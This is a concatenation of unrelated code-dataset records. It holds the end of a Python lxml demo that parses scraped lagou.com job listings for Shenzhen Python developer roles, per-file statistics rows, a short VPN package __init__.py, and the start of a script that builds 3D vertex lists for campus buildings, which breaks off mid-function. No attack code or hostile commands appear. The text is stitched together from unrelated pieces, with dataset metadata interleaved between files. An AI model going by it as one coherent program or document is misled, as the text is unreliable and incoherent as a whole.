<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0105" data-lg-tj-cid="69152" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-28k</span>
<!--<i></i>-->经验3-5年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/69152.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0105
" data-lg-tj-cid="69152" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">博奥特科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,金融 / 未融资
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/69152.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0105
" data-lg-tj-cid="69152" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/18/B4/CgoB5ln71t2ADbc3AABFDELpI7U021.jpg" alt="博奥特科技" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>金融</span>
<span>Java</span>
<span>cobol</span>
</div>
<div class="li_b_r">“发展前景好,双休,互联网金融”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="5" data-positionid="2889252" data-salary="15k-30k" data-company="万科物业" data-positionname="Python开发工程师" data-companyid="8350" data-hrid="7279982" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2889252.html" target="_blank" data-index="5" data-lg-tj-id="8E00" data-lg-tj-no="
0106
" data-lg-tj-cid="2889252" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发工程师</h3>
<span class="add">[<em>上梅林</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="xiongx04">
<input type="hidden" class="hr_position" value="">
<input type="hidden" class="target_hr" value="7279982">
<input type="hidden" class="target_position" value="2889252">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0106" data-lg-tj-cid="8350" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-30k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/8350.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0106
" data-lg-tj-cid="8350" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">万科物业</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
O2O,生活服务 / 不需要融资
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/8350.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0106
" data-lg-tj-cid="8350" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image2/M00/08/03/CgqLKVYBEtqAD2vhAAARnNY0kzg058.png" alt="万科物业" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>资深</span>
<span>高级</span>
<span>中级</span>
<span>后端开发</span>
<span>redis</span>
</div>
<div class="li_b_r">“平台好,空间大”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="6" data-positionid="2786718" data-salary="10k-15k" data-company="环球易购" data-positionname="高级python开发工程师" data-companyid="83025" data-hrid="2117758" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2786718.html" target="_blank" data-index="6" data-lg-tj-id="8E00" data-lg-tj-no="
0107
" data-lg-tj-cid="2786718" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">高级python开发工程师</h3>
<span class="add">[<em>南山区</em>]</span>
</a>
<span class="format-time">1天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/1E/F1/CgoB5loL-aGASIqDAAATxYblCtQ334.jpg">
<input type="hidden" class="hr_name" value="Hipson">
<input type="hidden" class="hr_position" value="首席神秘官">
<input type="hidden" class="target_hr" value="2117758">
<input type="hidden" class="target_position" value="2786718">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0107" data-lg-tj-cid="83025" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">10k-15k</span>
<!--<i></i>-->经验3-5年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/83025.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0107
" data-lg-tj-cid="83025" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">环球易购</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
电子商务 / 上市公司
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/83025.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0107
" data-lg-tj-cid="83025" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/38/9F/CgYXBlWmIt6Af8k5AABvK21LZWM490.jpg?cc=0.211507520172745" alt="环球易购" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>软件开发</span>
</div>
<div class="li_b_r">“上市公司 公司规模大 发展机会多”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="7" data-positionid="3325916" data-salary="15k-23k" data-company="晶泰科技" data-positionname="高级Python开发工程师" data-companyid="76066" data-hrid="5281055" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3325916.html" target="_blank" data-index="7" data-lg-tj-id="8E00" data-lg-tj-no="
0108
" data-lg-tj-cid="3325916" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">高级Python开发工程师</h3>
<span class="add">[<em>香蜜湖</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image/M00/48/46/CgpFT1loITKAe1YZAAD7YMAGvnI602.jpg">
<input type="hidden" class="hr_name" value="李丹慧">
<input type="hidden" class="hr_position" value="HR经理">
<input type="hidden" class="target_hr" value="5281055">
<input type="hidden" class="target_position" value="3325916">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0108" data-lg-tj-cid="76066" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-23k</span>
<!--<i></i>-->经验1-3年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/76066.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0108
" data-lg-tj-cid="76066" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">晶泰科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
企业服务,医疗健康 / B轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/76066.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0108
" data-lg-tj-cid="76066" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/46/CE/CgqKkVeNuE-AMgmGAACJzPxVN30374.jpg" alt="晶泰科技" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>云计算</span>
<span>后端开发</span>
<span>web</span>
<span>Go</span>
<span>django</span>
</div>
<div class="li_b_r">“大牛多,公司氛围好,周末双休,成长快”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="8" data-positionid="3727987" data-salary="14k-20k" data-company="盖威" data-positionname="Python开发工程师" data-companyid="3956" data-hrid="5713991" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3727987.html" target="_blank" data-index="8" data-lg-tj-id="8E00" data-lg-tj-no="
0109
" data-lg-tj-cid="3727987" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发工程师</h3>
<span class="add">[<em>科技园</em>]</span>
</a>
<span class="format-time">3天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="hr-gw">
<input type="hidden" class="hr_position" value="HR经理">
<input type="hidden" class="target_hr" value="5713991">
<input type="hidden" class="target_position" value="3727987">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0109" data-lg-tj-cid="3956" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">14k-20k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/3956.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0109
" data-lg-tj-cid="3956" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">盖威</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
金融 / 不需要融资
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/3956.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0109
" data-lg-tj-cid="3956" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/0A/Cgo8PFTUWBWAJ-eQAAA1pEtnnYo973.png" alt="盖威" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>linux</span>
<span>C++</span>
</div>
<div class="li_b_r">“福利待遇好”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="9" data-positionid="2010228" data-salary="15k-25k" data-company="极光" data-positionname="高级Python开发工程师" data-companyid="917" data-hrid="2153176" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2010228.html" target="_blank" data-index="9" data-lg-tj-id="8E00" data-lg-tj-no="
0110
" data-lg-tj-cid="2010228" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">高级Python开发工程师</h3>
<span class="add">[<em>南头</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="i/image2/M00/0A/38/CgotOVncPOGAR2E7AABUArhVY0U298.jpg">
<input type="hidden" class="hr_name" value="Maggie">
<input type="hidden" class="hr_position" value="HRBP">
<input type="hidden" class="target_hr" value="2153176">
<input type="hidden" class="target_position" value="2010228">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0110" data-lg-tj-cid="917" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-25k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/917.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0110
" data-lg-tj-cid="917" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">极光</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,数据服务 / D轮及以上
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/917.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0110
" data-lg-tj-cid="917" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/37/20/CgqKkVdfms6Ac6dNAABY3gBvuqI944.jpg" alt="极光" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>云计算</span>
<span>linux</span>
<span>云平台</span>
<span>django</span>
</div>
<div class="li_b_r">“五险一金、14薪/年、下午茶、工作餐等等”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="10" data-positionid="2022151" data-salary="20k-35k" data-company="航仕科技" data-positionname="Python开发" data-companyid="129877" data-hrid="5095526" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2022151.html" target="_blank" data-index="10" data-lg-tj-id="8E00" data-lg-tj-no="
0111
" data-lg-tj-cid="2022151" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发</h3>
<span class="add">[<em>科技园</em>]</span>
</a>
<span class="format-time">2017-11-21</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="hr">
<input type="hidden" class="hr_position" value="高级招聘经理">
<input type="hidden" class="target_hr" value="5095526">
<input type="hidden" class="target_position" value="2022151">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0111" data-lg-tj-cid="129877" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">20k-35k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/129877.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0111
" data-lg-tj-cid="129877" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">航仕科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网,O2O / C轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/129877.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0111
" data-lg-tj-cid="129877" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/2C/9A/Cgp3O1c5oTuAVfXXAABDG8Kg38w820.jpg" alt="航仕科技" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>年底双薪</span>
<span>午餐补助</span>
<span>专项奖金</span>
<span>绩效奖金</span>
</div>
<div class="li_b_r">“BAT的薪资福利待遇,更有技术大牛传授技术”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="11" data-positionid="3759498" data-salary="15k-30k" data-company="Minieye" data-positionname="python工程师" data-companyid="124262" data-hrid="4784940" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3759498.html" target="_blank" data-index="11" data-lg-tj-id="8E00" data-lg-tj-no="
0112
" data-lg-tj-cid="3759498" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">python工程师</h3>
<span class="add">[<em>南山区</em>]</span>
</a>
<span class="format-time">12:39发布</span>
<input type="hidden" class="hr_portrait" value="i/image/M00/6C/B8/CgpEMlmtQ92AOPnVAACbmIFfngQ360.jpg">
<input type="hidden" class="hr_name" value="HRM">
<input type="hidden" class="hr_position" value="">
<input type="hidden" class="target_hr" value="4784940">
<input type="hidden" class="target_position" value="3759498">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0112" data-lg-tj-cid="124262" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-30k</span>
<!--<i></i>-->经验1-3年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/124262.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0112
" data-lg-tj-cid="124262" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">Minieye</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
硬件,其他 / A轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/124262.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0112
" data-lg-tj-cid="124262" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/B1/8D/CgqKkVi5Jd6AA65GAAAmAaWjB9U423.png" alt="Minieye" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>无人驾驶</span>
<span>国际标准</span>
<span>车厂合作</span>
<span>海归团队</span>
</div>
<div class="li_b_r">“无人驾驶,车厂合作,扁平化管理,股票期权”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="12" data-positionid="2268991" data-salary="15k-30k" data-company="糗事百科" data-positionname="Python" data-companyid="1015" data-hrid="94398" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/2268991.html" target="_blank" data-index="12" data-lg-tj-id="8E00" data-lg-tj-no="
0113
" data-lg-tj-cid="2268991" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python</h3>
<span class="add">[<em>科技园</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="image1/M00/1C/89/Cgo8PFUmLZ-AJRIkAAAgw3YTWBk532.png">
<input type="hidden" class="hr_name" value="糗百招聘">
<input type="hidden" class="hr_position" value="招聘HR">
<input type="hidden" class="target_hr" value="94398">
<input type="hidden" class="target_position" value="2268991">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0113" data-lg-tj-cid="1015" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-30k</span>
<!--<i></i>-->经验3-5年 / 本科
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/1015.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0113
" data-lg-tj-cid="1015" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">糗事百科</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
移动互联网 / A轮
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/1015.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0113
" data-lg-tj-cid="1015" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/05/CgYXBlTUWAGAY0KwAABsvAoi2t4880.png" alt="糗事百科" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>文化娱乐</span>
</div>
<div class="li_b_r">“老司机来开车”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="13" data-positionid="3834269" data-salary="15k-25k" data-company="通力互联" data-positionname="Python开发工程师" data-companyid="123777" data-hrid="4752170" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3834269.html" target="_blank" data-index="13" data-lg-tj-id="8E00" data-lg-tj-no="
0114
" data-lg-tj-cid="3834269" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发工程师</h3>
<span class="add">[<em>草埔</em>]</span>
</a>
<span class="format-time">1天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="李龙辉">
<input type="hidden" class="hr_position" value="招聘经理">
<input type="hidden" class="target_hr" value="4752170">
<input type="hidden" class="target_position" value="3834269">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0114" data-lg-tj-cid="123777" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
</div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">15k-25k</span>
<!--<i></i>-->经验5-10年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/123777.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0114
" data-lg-tj-cid="123777" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">通力互联</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
电子商务,企业服务 / 不需要融资
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/123777.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0114
" data-lg-tj-cid="123777" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/2E/03/CgqKkVc9jmCAI8DpAAD09YLPnBk157.png" alt="通力互联" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>云计算</span>
<span>Java</span>
<span>SVN</span>
</div>
<div class="li_b_r">“高薪高福利”</div>
</div>
</li>
<li class="con_list_item default_list" data-index="14" data-positionid="3836101" data-salary="12k-18k" data-company="金证股份" data-positionname="Python开发" data-companyid="25317" data-hrid="5715150" data-tpladword="0">
<div class="list_item_top">
<div class="position">
<div class="p_top">
<a class="position_link" href="https://www.lagou.com/jobs/3836101.html" target="_blank" data-index="14" data-lg-tj-id="8E00" data-lg-tj-no="
0115
" data-lg-tj-cid="3836101" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">
<h3 style="max-width: 180px;">Python开发</h3>
<span class="add">[<em>福田区</em>]</span>
</a>
<span class="format-time">2天前发布</span>
<input type="hidden" class="hr_portrait" value="">
<input type="hidden" class="hr_name" value="lis">
<input type="hidden" class="hr_position" value="运营总监">
<input type="hidden" class="target_hr" value="5715150">
<input type="hidden" class="target_position" value="3836101">
<div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0115" data-lg-tj-cid="25317" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div>
<i class="pos_icon pos_icon_12"></i></div>
<div class="p_bot">
<div class="li_b_l">
<span class="money">12k-18k</span>
<!--<i></i>-->经验3-5年 / 大专
</div>
</div>
</div>
<div class="company">
<div class="company_name">
<a href="https://www.lagou.com/gongsi/25317.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no="
0115
" data-lg-tj-cid="25317" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">金证股份</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i>
</div>
<div class="industry">
金融 / 上市公司
</div>
</div>
<div class="com_logo">
<a href="https://www.lagou.com/gongsi/25317.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no="
0115
" data-lg-tj-cid="25317" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/image1/M00/00/34/Cgo8PFTUXJOAMEEpAAAroeFn454603.jpg" alt="金证股份" width="60" height="60"></a>
</div>
</div>
<div class="list_item_bot">
<div class="li_b_l">
<span>统计</span>
<span>财经</span>
<span>Perl</span>
<span>自然语言处理</span>
</div>
<div class="li_b_r">“上市公司,大型项目,年度调薪,薪资福利好”</div>
</div>
</li>
</ul>
"""
html = etree.HTML(text) #parse the string into an HTML document tree
#serialize the HTML document (etree.tostring returns bytes by default;
#pass encoding="unicode" for str output)
result = etree.tostring(html)
print(result)
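# A follow-up sketch (not part of the original demo): once parsed, data can be
# pulled out of the tree with XPath. The expressions below assume the lagou.com
# markup embedded above (an <h3> holds the position name, span.money the salary).
for li in html.xpath('//li[contains(@class, "con_list_item")]'):
    name = li.xpath('.//h3/text()')                       # e.g. ['python工程师']
    salary = li.xpath('.//span[@class="money"]/text()')   # e.g. ['18k-25k']
    print(name, salary)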
avg_line_length: 26.759594 | max_line_length: 249 | alphanum_fraction: 0.485006
(remaining per-file quality-signal columns omitted)

hexsha: 86f862c37f1fc4105b32506c2611e1984f6d6818 | size: 162 | ext: py | lang: Python
max_stars_repo_path: sentinel/vpn/__init__.py | max_stars_repo_name: allagog0x01/sentwg | max_stars_repo_head_hexsha: 52285ecf2b03c30a78901a29a7af96c8ab5764c8 | max_stars_repo_licenses: ["Apache-2.0"] | null | null | null
max_issues_repo_path: sentinel/vpn/__init__.py | max_issues_repo_name: allagog0x01/sentwg | max_issues_repo_head_hexsha: 52285ecf2b03c30a78901a29a7af96c8ab5764c8 | max_issues_repo_licenses: ["Apache-2.0"] | null | null | null
max_forks_repo_path: sentinel/vpn/__init__.py | max_forks_repo_name: allagog0x01/sentwg | max_forks_repo_head_hexsha: 52285ecf2b03c30a78901a29a7af96c8ab5764c8 | max_forks_repo_licenses: ["Apache-2.0"] | null | null | null
# coding=utf-8
from .helpers import disconnect_client
from .helpers import get_sessions
from .helpers import update_session_data
from .wireguard import wireguard
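# The bare imports above re-export the package API, so callers can write, e.g.
# (hypothetical usage, not from the original file):
#   from sentinel.vpn import get_sessions, disconnect_client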
avg_line_length: 27 | max_line_length: 40 | alphanum_fraction: 0.845679
(remaining per-file quality-signal columns omitted)

hexsha: 8132159a1a5d1c76b35cec455f4090967bd3a1dc | size: 26,856 | ext: py | lang: Python
max_stars_repo_path: createVertexBuilding.py | max_stars_repo_name: geraldzakwan/ITBMaps | max_stars_repo_head_hexsha: d31a0751d5b6b958ea3c831ac218e7e869c409c8 | max_stars_repo_licenses: ["MIT", "WTFPL", "Unlicense"] | null | null | null
max_issues_repo_path: createVertexBuilding.py | max_issues_repo_name: geraldzakwan/ITBMaps | max_issues_repo_head_hexsha: d31a0751d5b6b958ea3c831ac218e7e869c409c8 | max_issues_repo_licenses: ["MIT", "WTFPL", "Unlicense"] | null | null | null
max_forks_repo_path: createVertexBuilding.py | max_forks_repo_name: geraldzakwan/ITBMaps | max_forks_repo_head_hexsha: d31a0751d5b6b958ea3c831ac218e7e869c409c8 | max_forks_repo_licenses: ["MIT", "WTFPL", "Unlicense"] | null | null | null
w, h = 4, 100
list_of_gedung = [[0 for x in range(w)] for y in range(h)]
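# NOTE: the zeros are placeholders; each list_of_gedung[i] is expected to be
# filled with four [x, y, z] corner coordinates (one per base corner) before
# createAllBuilding() runs, since it indexes list_of_gedung[i][j][k] three deep.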
def createVertex(upperbackleft_x, upperbackleft_y, upperbackleft_z, upperbackright_x, upperbackright_y, upperbackright_z, upperfrontleft_x, upperfrontleft_y, upperfrontleft_z, upperfrontright_x, upperfrontright_y, upperfrontright_z, underbackleft_x, underbackleft_y, underbackleft_z, underbackright_x, underbackright_y, underbackright_z, underfrontleft_x, underfrontleft_y, underfrontleft_z, underfrontright_x, underfrontright_y, underfrontright_z):
vertex = []
#TR1 (left side)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(underfrontleft_x)
vertex.append(underfrontleft_y)
vertex.append(underfrontleft_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
#TR2 (back side)
vertex.append(upperbackright_x)
vertex.append(upperbackright_y)
vertex.append(upperbackright_z)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(upperbackleft_x)
vertex.append(upperbackleft_y)
vertex.append(upperbackleft_z)
#TR3 (under side)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(underbackright_x)
vertex.append(underbackright_y)
vertex.append(underbackright_z)
#TR4 (back side)
vertex.append(upperbackright_x)
vertex.append(upperbackright_y)
vertex.append(upperbackright_z)
vertex.append(underbackright_x)
vertex.append(underbackright_y)
vertex.append(underbackright_z)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
#TR5 (left side)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
vertex.append(upperbackleft_x)
vertex.append(upperbackleft_y)
vertex.append(upperbackleft_z)
#TR6 (under side)
vertex.append(underbackleft_x)
vertex.append(underbackleft_y)
vertex.append(underbackleft_z)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
vertex.append(underfrontleft_x)
vertex.append(underfrontleft_y)
vertex.append(underfrontleft_z)
#TR7 (front side)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
vertex.append(upperfrontleft_x)
vertex.append(upperfrontleft_y)
vertex.append(upperfrontleft_z)
vertex.append(underfrontleft_x)
vertex.append(underfrontleft_y)
vertex.append(underfrontleft_z)
#TR8 (right side)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(underbackright_x)
vertex.append(underbackright_y)
vertex.append(underbackright_z)
vertex.append(upperbackright_x)
vertex.append(upperbackright_y)
vertex.append(upperbackright_z)
#TR9 (right side)
vertex.append(underbackright_x)
vertex.append(underbackright_y)
vertex.append(underbackright_z)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(underfrontright_x)
vertex.append(underfrontright_y)
vertex.append(underfrontright_z)
#TR10 (upper side)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(upperbackright_x)
vertex.append(upperbackright_y)
vertex.append(upperbackright_z)
vertex.append(upperbackleft_x)
vertex.append(upperbackleft_y)
vertex.append(upperbackleft_z)
#TR11 (upper side)
vertex.append(upperfrontright_x)
vertex.append(upperfrontright_y)
vertex.append(upperfrontright_z)
vertex.append(upperbackleft_x)
vertex.append(upperbackleft_y)
vertex.append(upperbackleft_z)
vertex.append(upperfrontleft_x)
